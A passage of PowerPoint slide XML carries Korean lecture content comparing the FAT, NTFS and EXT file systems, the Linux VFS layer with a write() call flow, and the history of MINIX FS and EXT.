            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="110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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저용량 볼륨에서 최적화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대용량 볼륨의 비효율적 이용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT, DOS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>윈도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>95, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>등</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보안에 취약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 접근 제어 불가능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>종류 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: FAT12, FAT16, FAT32 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>최대 표현 가능한 클러스터의 수를 비트 수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>N T F S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>Windows NT File System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>전용 파일시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대용량 볼륨에 대한 효과적 지원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>디스크 공간의 효과적 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보안과 암호화 또한 지원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 접근 속도를 최적화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>특정 파일이나 디렉토리 자동 압축 기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다른 운영체제에서 호환 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>안됌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저용량 볼륨에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 느림</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E X T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>리눅스 운영체제를 목표로 만들어짐</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MFS-&gt;EXT1-&gt;EXT2-&gt;EXT3-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>EXT4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쵀대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이름 크기 등이 보완됨</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파일 시스템 손상 가능성이 더 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>줄어듬</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err="1"/>
              <a:t>저널링</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>로그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 만들어서 시스템이 비정상적으로 종료 되었을 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>파일 시스템을 복구</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>하는 기능 지원</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/Theory/T3/Def </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>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순서</a:t>
            </a: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a:t>VFS : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>파일시스템 관련 인터페이스를 사용자 공간 어플리케이션에 제공하는 커널 서브시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>여러 종류의 파일 시스템을 서로 호환해야 하기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>, VFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>가 필요함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>VLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="140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Disk</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="110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OS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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Virtual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>File System</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Ext 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Write()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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&lt;User&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800"/>
              <a:t>/test/myfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“Helloworld!”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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err="1"/>
              <a:t>sys_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>write()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Excute!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Theory/T3/History </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 역사</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>MFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>MINIX File System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IBM PC/AT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>마이크로 컴퓨터 목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년대 유행</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파일이름은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>문자만 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>64MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일당 오직 한개의 타임스탬프</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>커널에 새로운 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용</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파일이름으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>자를 사용가능 </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최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 저장 공간</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="120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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
